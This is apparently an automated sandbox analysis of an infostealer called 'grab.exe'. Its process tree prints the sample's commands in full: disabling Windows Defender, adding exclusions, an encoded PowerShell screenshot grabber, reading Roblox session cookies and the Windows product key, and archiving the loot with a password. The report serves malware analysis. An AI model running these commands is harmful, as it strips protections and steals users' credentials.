Analysis

  • max time kernel
    15s
  • max time network
    20s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    11-05-2024 09:52

General

  • Target

    grab.exe

  • Size

    7.5MB

  • MD5

    553d236d2a6a0a4ca78641f9a932ecaa

  • SHA1

    3b0354f24b67f16efd93afcb95540886ef091490

  • SHA256

    5ec487769f184e246bef6dc014df3eed2193d22c7887b0adedc4bb69299f8cf4

  • SHA512

    e575738994a46704f14d44b9e38b3f9b67f2d507eb7fce7ada95b6dfe5697b783137de20dc88004f5fae964ffbcd47880447d6b07c2024353c7f926054333bc6

  • SSDEEP

    196608:FyQsJbT/9bvLz3S1bA32O5iJdYW0+S5/Ukgdv:uJbTlj3S1bO2g8c+Si5

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\grab.exe
    "C:\Users\Admin\AppData\Local\Temp\grab.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4380
    • C:\Users\Admin\AppData\Local\Temp\grab.exe
      "C:\Users\Admin\AppData\Local\Temp\grab.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\grab.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\grab.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:540
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:4796
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:5108
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3136
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:884
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1888
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4728
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3612
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2440
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:704
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4496
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4348
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2336
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:2572
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2616
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4320
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:568
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3196
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:3384
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4656
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                      PID:4204
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                          PID:1672
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:5040
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:1960
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:644
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1800
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z03tnsmy\z03tnsmy.cmdline"
                                5⤵
                                  PID:4860
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6428.tmp" "c:\Users\Admin\AppData\Local\Temp\z03tnsmy\CSC70CC0669FE634E3891146180537420A0.TMP"
                                    6⤵
                                      PID:2904
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3200
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2736
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:1148
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:484
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4084
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:3296
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:1952
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:2552
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4884
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:4492
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:3004
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1028
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      3⤵
                                                        PID:3136
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:484
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                        3⤵
                                                          PID:4352
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            4⤵
                                                              PID:2904
                                                            • C:\Windows\system32\getmac.exe
                                                              getmac
                                                              4⤵
                                                                PID:1880
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43802\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\mZRFj.zip" *"
                                                              3⤵
                                                                PID:5068
                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI43802\rar.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI43802\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\mZRFj.zip" *
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:4196
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                3⤵
                                                                  PID:3612
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic os get Caption
                                                                    4⤵
                                                                      PID:2564
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                    3⤵
                                                                      PID:1616
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic computersystem get totalphysicalmemory
                                                                        4⤵
                                                                          PID:3124
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                        3⤵
                                                                          PID:4192
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic csproduct get uuid
                                                                            4⤵
                                                                              PID:3476
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                            3⤵
                                                                              PID:4292
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                4⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:4080
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                              3⤵
                                                                                PID:5092
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic path win32_VideoController get name
                                                                                  4⤵
                                                                                  • Detects videocard installed
                                                                                  PID:4200
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                3⤵
                                                                                  PID:1932
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                    4⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:5004

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                            Execution

                                                                            Command and Scripting Interpreter

                                                                            1
                                                                            T1059

                                                                            PowerShell

                                                                            1
                                                                            T1059.001

                                                                            Credential Access

                                                                            Unsecured Credentials

                                                                            2
                                                                            T1552

                                                                            Credentials In Files

                                                                            2
                                                                            T1552.001

                                                                            Discovery

                                                                            System Information Discovery

                                                                            3
                                                                            T1082

                                                                            Process Discovery

                                                                            1
                                                                            T1057

                                                                            Collection

                                                                            Data from Local System

                                                                            2
                                                                            T1005

                                                                            Command and Control

                                                                            Web Service

                                                                            1
                                                                            T1102

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                              Filesize

                                                                              2KB

